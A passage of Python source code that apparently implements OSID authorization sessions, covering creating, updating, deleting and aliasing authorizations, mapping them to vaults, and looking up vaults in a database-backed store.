arg: function_id (osid.id.Id): the function ``Id``
arg: qualifier_id (osid.id.Id): the qualifier ``Id``
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``resource_id, function_id`` or
``qualifier_id`` is not found
raise: NullArgument - ``resource_id, function_id,
qualifier_id,`` or ``authorization_record_types`` is
``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form with requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
if not isinstance(resource_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(function_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(qualifier_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
for arg in authorization_record_types:
if not isinstance(arg, ABCType):
raise errors.InvalidArgument('one or more argument array elements is not a valid OSID Type')
if authorization_record_types == []:
# NOTE: passing vault_id=self._catalog_id below appears redundant with catalog_id
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
resource_id=resource_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
proxy=self._proxy)
else:
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
record_types=authorization_record_types,
resource_id=resource_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
proxy=self._proxy)
obj_form._for_update = False
self._forms[obj_form.get_id().get_identifier()] = not CREATED
return obj_form
@utilities.arguments_not_none
def get_authorization_form_for_create_for_resource_and_trust(self, resource_id, trust_id, function_id, qualifier_id, authorization_record_types):
"""Gets the authorization form for creating new authorizations.
A new form should be requested for each create transaction.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: trust_id (osid.id.Id): an ``Id`` for a circle of trust
arg: function_id (osid.id.Id): a function ``Id``
arg: qualifier_id (osid.id.Id): the qualifier ``Id``
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``resource_id, trust_id, function_id,`` or
``qualifier_id`` is not found
raise: NullArgument - ``resource_id, trust_id,
function_id, qualifier_id`` or
``authorization_record_types`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form with requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def create_authorization(self, authorization_form):
"""Creates a new explicit ``Authorization``.
arg: authorization_form
(osid.authorization.AuthorizationForm): the
authorization form
return: (osid.authorization.Authorization) - the new
``Authorization``
raise: IllegalState - ``authorization_form`` already used in a
create transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``authorization_form`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - ``authorization_form`` did not originate
from this service
*compliance: mandatory -- This method must be implemented.*
"""
# TODO: not using the create_resource template
# because want to prevent duplicate authorizations
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_form, ABCAuthorizationForm):
raise errors.InvalidArgument('argument type is not an AuthorizationForm')
if authorization_form.is_for_update():
raise errors.InvalidArgument('the AuthorizationForm is for update only, not create')
try:
if self._forms[authorization_form.get_id().get_identifier()] == CREATED:
raise errors.IllegalState('authorization_form already used in a create transaction')
except KeyError:
raise errors.Unsupported('authorization_form did not originate from this session')
if not authorization_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
# try to check first here
try:
osid_map = collection.find_one({"agentId": authorization_form._my_map['agentId'],
"functionId": authorization_form._my_map['functionId'],
"qualifierId": authorization_form._my_map['qualifierId'],
"assignedVaultIds": authorization_form._my_map['assignedVaultIds']})
osid_map['startDate'] = authorization_form._my_map['startDate']
osid_map['endDate'] = authorization_form._my_map['endDate']
collection.save(osid_map)
except errors.NotFound:
insert_result = collection.insert_one(authorization_form._my_map)
self._forms[authorization_form.get_id().get_identifier()] = CREATED
osid_map = collection.find_one({'_id': insert_result.inserted_id})
result = objects.Authorization(
osid_object_map=osid_map,
runtime=self._runtime,
proxy=self._proxy)
return result
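# Usage sketch (illustrative only; the manager, proxy, and Ids are assumed
# to come from a configured runtime, not from this module):
#     admin_session = mgr.get_authorization_admin_session_for_vault(vault_id)
#     form = admin_session.get_authorization_form_for_create_for_agent(
#         agent_id, function_id, qualifier_id, [])
#     authz = admin_session.create_authorization(form)
# Note that create_authorization() deliberately deduplicates: if a document
# with the same agentId/functionId/qualifierId/assignedVaultIds already
# exists, only its startDate and endDate are updated; no new document is
# inserted.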
def can_update_authorizations(self):
"""Tests if this user can update ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating an
``Authorization`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
update operations to an unauthorized user.
return: (boolean) - ``false`` if authorization modification is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_update_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_authorization_form_for_update(self, authorization_id):
"""Gets the authorization form for updating an existing authorization.
A new authorization form should be requested for each update
transaction.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.get_resource_form_for_update_template
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
if (authorization_id.get_identifier_namespace() != 'authorization.Authorization' or
authorization_id.get_authority() != self._authority):
raise errors.InvalidArgument()
result = collection.find_one({'_id': ObjectId(authorization_id.get_identifier())})
obj_form = objects.AuthorizationForm(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
self._forms[obj_form.get_id().get_identifier()] = not UPDATED
return obj_form
@utilities.arguments_not_none
def update_authorization(self, authorization_form):
"""Updates an existing authorization.
arg: authorization_form
(osid.authorization.AuthorizationForm): the form
containing the elements to be updated
raise: IllegalState - ``authorization_form`` already used in an
update transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``authorization_form`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - ``authorization_form`` did not originate
from ``get_authorization_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.update_resource_template
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_form, ABCAuthorizationForm):
raise errors.InvalidArgument('argument type is not an AuthorizationForm')
if not authorization_form.is_for_update():
raise errors.InvalidArgument('the AuthorizationForm is for create only, not update')
try:
if self._forms[authorization_form.get_id().get_identifier()] == UPDATED:
raise errors.IllegalState('authorization_form already used in an update transaction')
except KeyError:
raise errors.Unsupported('authorization_form did not originate from this session')
if not authorization_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
collection.save(authorization_form._my_map)
self._forms[authorization_form.get_id().get_identifier()] = UPDATED
# Note: this is out of spec. The OSIDs don't require an object to be returned:
return objects.Authorization(
osid_object_map=authorization_form._my_map,
runtime=self._runtime,
proxy=self._proxy)
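# Usage sketch (illustrative; assumes an existing ``authorization_id``):
#     form = admin_session.get_authorization_form_for_update(authorization_id)
#     # ... modify form elements, then:
#     admin_session.update_authorization(form)
# The form is single-use: a second update_authorization() call with the same
# form raises IllegalState, per the self._forms bookkeeping above.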
def can_delete_authorizations(self):
"""Tests if this user can delete ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting an
``Authorization`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
delete operations to an unauthorized user.
return: (boolean) - ``false`` if ``Authorization`` deletion is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_delete_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def delete_authorization(self, authorization_id):
"""Deletes the ``Authorization`` identified by the given ``Id``.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization`` to delete
raise: NotFound - an ``Authorization`` was not found identified
by the given ``Id``
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.delete_resource_template
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
authorization_map = collection.find_one(
dict({'_id': ObjectId(authorization_id.get_identifier())},
**self._view_filter()))
objects.Authorization(osid_object_map=authorization_map, runtime=self._runtime, proxy=self._proxy)._delete()
collection.delete_one({'_id': ObjectId(authorization_id.get_identifier())})
def can_manage_authorization_aliases(self):
"""Tests if this user can manage ``Id`` aliases for ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known changing an alias
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer alias
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Authorization`` aliasing is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def alias_authorization(self, authorization_id, alias_id):
"""Adds an ``Id`` to an ``Authorization`` for the purpose of creating compatibility.
The primary ``Id`` of the ``Authorization`` is determined by the
provider. The new ``Id`` performs as an alias to the primary
``Id``. If the alias is a pointer to another authorization, it
is reassigned to the given authorization ``Id``.
arg: authorization_id (osid.id.Id): the ``Id`` of an
``Authorization``
arg: alias_id (osid.id.Id): the alias ``Id``
raise: AlreadyExists - ``alias_id`` is already assigned
raise: NotFound - ``authorization_id`` not found
raise: NullArgument - ``authorization_id`` or ``alias_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.alias_resources_template
self._alias_id(primary_id=authorization_id, equivalent_id=alias_id)
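# Aliasing sketch (illustrative): after
#     admin_session.alias_authorization(authorization_id, alias_id)
# lookups by ``alias_id`` resolve to the same ``Authorization`` as lookups
# by the primary Id; the mapping is maintained by the inherited _alias_id()
# helper, and an alias already pointing elsewhere is reassigned.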
class AuthorizationVaultSession(abc_authorization_sessions.AuthorizationVaultSession, osid_sessions.OsidSession):
"""This session provides methods to retrieve ``Authorization`` to ``Vault`` mappings.
An ``Authorization`` may appear in multiple ``Vaults``. Each
``Vault`` may have its own authorizations governing who is allowed
to look at it.
This lookup session defines several views:
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete result set or is an error
condition
"""
_session_namespace = 'authorization.AuthorizationVaultSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession._init_catalog(self, proxy, runtime)
self._catalog_view = COMPARATIVE
self._kwargs = kwargs
def use_comparative_vault_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_comparative_bin_view
self._catalog_view = COMPARATIVE
if self._catalog_session is not None:
self._catalog_session.use_comparative_catalog_view()
def use_plenary_vault_view(self):
"""A complete view of the ``Authorization`` and ``Vault`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_plenary_bin_view
self._catalog_view = PLENARY
if self._catalog_session is not None:
self._catalog_session.use_plenary_catalog_view()
def can_lookup_authorization_vault_mappings(self):
"""Tests if this user can perform lookups of authorization/vault mappings.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known lookup methods in
this session will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
lookup operations to unauthorized users.
return: (boolean) - ``false`` if looking up mappings is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.can_lookup_resource_bin_mappings
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_authorization_ids_by_vault(self, vault_id):
"""Gets the list of ``Authorization`` ``Ids`` associated with a ``Vault``.
arg: vault_id (osid.id.Id): ``Id`` of a ``Vault``
return: (osid.id.IdList) - list of related authorization ``Ids``
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resource_ids_by_bin
id_list = []
for authorization in self.get_authorizations_by_vault(vault_id):
id_list.append(authorization.get_id())
return IdList(id_list)
@utilities.arguments_not_none
def get_authorizations_by_vault(self, vault_id):
"""Gets the list of ``Authorizations`` associated with a ``Vault``.
arg: vault_id (osid.id.Id): ``Id`` of a ``Vault``
return: (osid.authorization.AuthorizationList) - list of related
authorization
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resources_by_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_authorization_lookup_session_for_vault(vault_id, proxy=self._proxy)
lookup_session.use_isolated_vault_view()
return lookup_session.get_authorizations()
@utilities.arguments_not_none
def get_authorization_ids_by_vaults(self, vault_ids):
"""Gets the list of ``Authorization Ids`` corresponding to a list of ``Vault`` objects.
arg: vault_ids (osid.id.IdList): list of vault ``Ids``
return: (osid.id.IdList) - list of authorization ``Ids``
raise: NullArgument - ``vault_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resource_ids_by_bin
id_list = []
for authorization in self.get_authorizations_by_vaults(vault_ids):
id_list.append(authorization.get_id())
return IdList(id_list)
@utilities.arguments_not_none
def get_authorizations_by_vaults(self, vault_ids):
"""Gets the list of ``Authorizations`` corresponding to a list of ``Vaults``.
arg: vault_ids (osid.id.IdList): list of vault ``Ids``
return: (osid.authorization.AuthorizationList) - list of
authorizations
raise: NullArgument - ``vault_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resources_by_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_authorization_lookup_session_for_vault(vault_ids, proxy=self._proxy)
lookup_session.use_isolated_vault_view()
return lookup_session.get_authorizations()
@utilities.arguments_not_none
def get_vault_ids_by_authorization(self, authorization_id):
"""Gets the list of ``Vault`` ``Ids`` mapped to an ``Authorization``.
arg: authorization_id (osid.id.Id): ``Id`` of an
``Authorization``
return: (osid.id.IdList) - list of vault ``Ids``
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_bin_ids_by_resource
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_authorization_lookup_session(proxy=self._proxy)
lookup_session.use_federated_vault_view()
authorization = lookup_session.get_authorization(authorization_id)
id_list = []
for idstr in authorization._my_map['assignedVaultIds']:
id_list.append(Id(idstr))
return IdList(id_list)
@utilities.arguments_not_none
def get_vaults_by_authorization(self, authorization_id):
"""Gets the list of ``Vault`` objects mapped to an ``Authorization``.
arg: authorization_id (osid.id.Id): ``Id`` of an
``Authorization``
return: (osid.authorization.VaultList) - list of vault
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class AuthorizationVaultAssignmentSession(abc_authorization_sessions.AuthorizationVaultAssignmentSession, osid_sessions.OsidSession):
"""This session provides methods to re-assign ``Authorizations`` to ``Vault``.
An ``Authorization`` may map to multiple ``Vault`` objects and
removing the last reference to an ``Authorization`` is the equivalent
of deleting it. Each ``Vault`` may have its own authorizations
governing who is allowed to operate on it.
Moving or adding a reference of an ``Authorization`` to another
``Vault`` is not a copy operation (e.g. it does not change its ``Id``).
"""
_session_namespace = 'authorization.AuthorizationVaultAssignmentSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession._init_catalog(self, proxy, runtime)
self._catalog_name = 'Vault'
self._forms = dict()
self._kwargs = kwargs
def can_assign_authorizations(self):
"""Tests if this user can alter authorization/vault mappings.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known mapping methods in
this session will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
assignment operations to unauthorized users.
return: (boolean) - ``false`` if mapping is not authorized,
``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.can_assign_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def can_assign_authorizations_to_vault(self, vault_id):
"""Tests if this user can alter authorization/vault mappings.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known mapping methods in
this session will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
assignment operations to unauthorized users.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
return: (boolean) - ``false`` if mapping is not authorized,
``true`` otherwise
raise: NullArgument - ``vault_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.can_assign_resources_to_bin
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if vault_id.get_identifier() == '000000000000000000000000':
return False
return True
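# NOTE: the all-zeros identifier above appears to be the phantom-root
# sentinel (compare PHANTOM_ROOT_IDENTIFIER in VaultLookupSession.get_vault
# below); nothing may be assigned directly to that synthetic root catalog.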
@utilities.arguments_not_none
def get_assignable_vault_ids(self, vault_id):
"""Gets a list of vault including and under the given vault node in which any authorization can be assigned.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
return: (osid.id.IdList) - list of assignable vault ``Ids``
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids
# This will likely be overridden by an authorization adapter
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_vault_lookup_session(proxy=self._proxy)
vaults = lookup_session.get_vaults()
id_list = []
for vault in vaults:
id_list.append(vault.get_id())
return IdList(id_list)
@utilities.arguments_not_none
def get_assignable_vault_ids_for_authorization(self, vault_id, authorization_id):
"""Gets a list of vault including and under the given vault node in which a specific authorization can be assigned.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
return: (osid.id.IdList) - list of assignable vault ``Ids``
raise: NullArgument - ``vault_id`` or ``authorization_id`` is
``null``
raise: OperationFailed - unable to complete request
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids_for_resource
# This will likely be overridden by an authorization adapter
return self.get_assignable_vault_ids(vault_id)
@utilities.arguments_not_none
def assign_authorization_to_vault(self, authorization_id, vault_id):
"""Adds an existing ``Authorization`` to a ``Vault``.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
raise: AlreadyExists - ``authorization_id`` is already assigned
to ``vault_id``
raise: NotFound - ``authorization_id`` or ``vault_id`` not
found
raise: NullArgument - ``authorization_id`` or ``vault_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.assign_resource_to_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_vault_lookup_session(proxy=self._proxy)
lookup_session.get_vault(vault_id) # to raise NotFound
self._assign_object_to_catalog(authorization_id, vault_id)
@utilities.arguments_not_none
def unassign_authorization_from_vault(self, authorization_id, vault_id):
"""Removes an ``Authorization`` from a ``Vault``.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
raise: NotFound - ``authorization_id`` or ``vault_id`` not
found or ``authorization_id`` not assigned to
``vault_id``
raise: NullArgument - ``authorization_id`` or ``vault_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.unassign_resource_from_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_vault_lookup_session(proxy=self._proxy)
lookup_session.get_vault(vault_id) # to raise NotFound
self._unassign_object_from_catalog(authorization_id, vault_id)
@utilities.arguments_not_none
def reassign_authorization_to_vault(self, authorization_id, from_vault_id, to_vault_id):
"""Moves an ``Authorization`` from one ``Vault`` to another.
Mappings to other ``Vaults`` are unaffected.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
arg: from_vault_id (osid.id.Id): the ``Id`` of the current
``Vault``
arg: to_vault_id (osid.id.Id): the ``Id`` of the destination
``Vault``
raise: NotFound - ``authorization_id, from_vault_id,`` or
``to_vault_id`` not found or ``authorization_id`` not
mapped to ``from_vault_id``
raise: NullArgument - ``authorization_id, from_vault_id,`` or
``to_vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.reassign_resource_to_bin
self.assign_authorization_to_vault(authorization_id, to_vault_id)
try:
self.unassign_authorization_from_vault(authorization_id, from_vault_id)
except: # something went wrong, roll back assignment to to_vault_id
self.unassign_authorization_from_vault(authorization_id, to_vault_id)
raise
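# Reassignment sketch (illustrative): the method above is assign-then-
# unassign, so a failure while unassigning from ``from_vault_id`` rolls the
# new mapping back before re-raising:
#     assignment_session.reassign_authorization_to_vault(
#         authorization_id, from_vault_id, to_vault_id)
# either moves the mapping completely or leaves it unchanged.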
class VaultLookupSession(abc_authorization_sessions.VaultLookupSession, osid_sessions.OsidSession):
"""This session provides methods for retrieving ``Vault`` objects.
The ``Vault`` represents a collection of ``Functions`` and
``Authorizations``.
This session defines views that offer differing behaviors when
retrieving multiple objects.
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete set or is an error condition
Generally, the comparative view should be used for most applications
as it permits operation even if there is data that cannot be
accessed. For example, a browsing application may only need to
examine the ``Vaults`` it can access, without breaking execution.
However, an administrative application may require all ``Vault``
elements to be available.
Vaults may have additional records indicated by their respective
record types. The record may not be accessed through a cast of the
``Vault``.
"""
_session_namespace = 'authorization.VaultLookupSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_lookup_session()
self._catalog_session.use_comparative_catalog_view()
self._catalog_view = COMPARATIVE
self._kwargs = kwargs
def can_lookup_vaults(self):
"""Tests if this user can perform ``Vault`` lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if lookup methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.can_lookup_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_lookup_catalogs()
return True
def use_comparative_vault_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_comparative_bin_view
self._catalog_view = COMPARATIVE
if self._catalog_session is not None:
self._catalog_session.use_comparative_catalog_view()
def use_plenary_vault_view(self):
"""A complete view of the ``Vault`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_plenary_bin_view
self._catalog_view = PLENARY
if self._catalog_session is not None:
self._catalog_session.use_plenary_catalog_view()
@utilities.arguments_not_none
def get_vault(self, vault_id):
"""Gets the ``Vault`` specified by its ``Id``.
In plenary mode, the exact ``Id`` is found or a ``NotFound``
results. Otherwise, the returned ``Vault`` may have a different
``Id`` than requested, such as the case where a duplicate ``Id``
was assigned to a ``Vault`` and retained for compatibility.
arg: vault_id (osid.id.Id): ``Id`` of the ``Vault``
return: (osid.authorization.Vault) - the vault
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.get_bin
if self._catalog_session is not None:
return self._catalog_session.get_catalog(catalog_id=vault_id)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
# Need to consider how to best deal with the "phantom root" catalog issue
if vault_id.get_identifier() == PHANTOM_ROOT_IDENTIFIER:
return self._get_phantom_root_catalog(cat_class=objects.Vault, cat_name='Vault')
try:
result = collection.find_one({'_id': ObjectId(self._get_id(vault_id, 'authorization').get_identifier())})
except errors.NotFound:
# Try creating an orchestrated Vault. Let it raise errors.NotFound()
result = self._create_orchestrated_cat(vault_id, 'authorization', 'Vault')
return objects.Vault(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
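# Lookup sketch (illustrative; assumes a configured runtime and proxy):
#     lookup_session = mgr.get_vault_lookup_session(proxy=proxy)
#     lookup_session.use_comparative_vault_view()
#     vault = lookup_session.get_vault(vault_id)
# Note the fallbacks above: the phantom-root identifier short-circuits to a
# synthesized root catalog, and an Id missing from this collection may still
# resolve by creating an orchestrated Vault mirroring another service's
# catalog.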
@utilities.arguments_not_none
def get_vaults_by_ids(self, vault_ids):
"""Gets a ``VaultList`` corresponding to the given ``IdList``.
In plenary mode, the returned list contains all of the vaults
specified in the ``Id`` list, in the order of the list,
including duplicates, or an error results if an ``Id`` in the
supplied list is not found or inaccessible. Otherwise,
inaccessible ``Vault`` objects may be omitted from the list and
may present the elements in any order including returning a
unique set.
arg: vault_ids (osid.id.IdList): the list of ``Ids`` to
retrieve
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NotFound - an ``Id`` was not found
raise: NullArgument - ``vault_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.get_bins_by_ids_template
# NOTE: This implementation currently ignores plenary view
# Also, this should be implemented to use get_vault() instead of going directly to the database
if self._catalog_session is not None:
return self._catalog_session.get_catalogs_by_ids(catalog_ids=vault_ids)
catalog_id_list = []
for i in vault_ids:
catalog_id_list.append(ObjectId(i.get_identifier()))
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find({'_id': {'$in': catalog_id_list}}).sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_vaults_by_genus_type(self, vault_genus_type):
"""Gets a ``VaultList`` corresponding to the given vault genus ``Type`` which does not include vaults of types derived from the specified ``Type``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: vault_genus_type (osid.type.Type): a vault genus type
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``vault_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find({'genusTypeId': {'$in': [str(vault_genus_type)]}}).sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_vaults_by_parent_genus_type(self, vault_genus_type):
"""Gets a ``VaultList`` corresponding to the given vault genus ``Type`` and include any additional vaults with genus types derived from the specified ``Type``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: vault_genus_type (osid.type.Type): a vault genus type
return: (osid.authorization.VaultList) - the returned ``Vault``
